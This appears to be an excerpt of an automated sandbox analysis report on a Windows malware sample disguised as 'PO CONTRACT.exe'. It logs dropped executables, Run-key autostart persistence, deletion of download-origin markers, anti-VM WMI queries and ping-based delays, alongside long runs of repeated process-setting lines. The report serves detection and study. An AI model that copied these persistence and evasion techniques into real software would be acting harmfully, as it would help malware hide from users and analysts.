                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F57A07 pushad ; ret 0_2_08F57B13
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F56C7D push eax; ret 0_2_08F56D86
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F57C10 push ecx; ret 0_2_08F57C22
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08F5B6FC pushad ; ret 0_2_08F5B6FD
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FFA43D push FFFFFF8Bh; iretd 0_2_08FFA43F
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF7C35 push ebx; retf 0_2_08FF7CF2
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF2573 push ebx; ret 0_2_08FF2579
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeCode function: 0_2_08FF7AED push eax; retf 0_2_08FF7C2D
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_013F6D72 push edx; ret 10_2_013F6D73
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C68E8 pushad ; ret 10_2_056C68F1
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C00BF push ebx; retf 10_2_056C00C2
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_056C72C8 pushad ; retf 10_2_056C7381
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_09177420 push eax; ret 10_2_09177473
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_09176C7D push eax; ret 10_2_09176D86
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917C8CC pushad ; retf 10_2_0917C8CD
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_09177B00 pushad ; ret 10_2_09177B13
                    Source: C:\Windows\SysWOW64\SOA.exeCode function: 10_2_0917E3FB push ebx; ret 10_2_0917E401
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_02F99FE0 push esp; iretd 11_2_02F9A091

                    Persistence and Installation Behavior

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Windows\SysWOW64\cmd.exeExecutable created and started: C:\Windows\SysWOW64\SOA.exeJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\SOA.exeJump to dropped file
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeJump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\SysWOW64\SOA.exeJump to dropped file

                    Boot Survival

                    barindex
                    Creates an autostart registry key pointing to binary in C:\Windows
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Creates multiple autostart registry keys
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SOAJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Hides that the sample has been downloaded from the Internet (zone.identifier)
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeFile opened: C:\Users\user\Desktop\PO CONTRACT.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeFile opened: C:\Windows\SysWOW64\SOA.exe\:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | deleteJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: Process Memory Space: PO CONTRACT.exe PID: 4388, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SOA.exe PID: 7300, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Tries to delay execution (extensive OutputDebugStringW loop)
                    Source: C:\Windows\SysWOW64\SOA.exeSection loaded: OutputDebugStringW count: 1941
                    Uses ping.exe to sleep
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 36Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 43Jump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 2D20000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 2ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 4ED0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 56D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 66D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 6AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\PO CONTRACT.exeMemory allocated: 7AE0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 13F0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 2EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 4EB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 56D0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\SysWOW64\SOA.exeMemory allocated: 66D0000 memory reserve | memory write watchJump to behavior
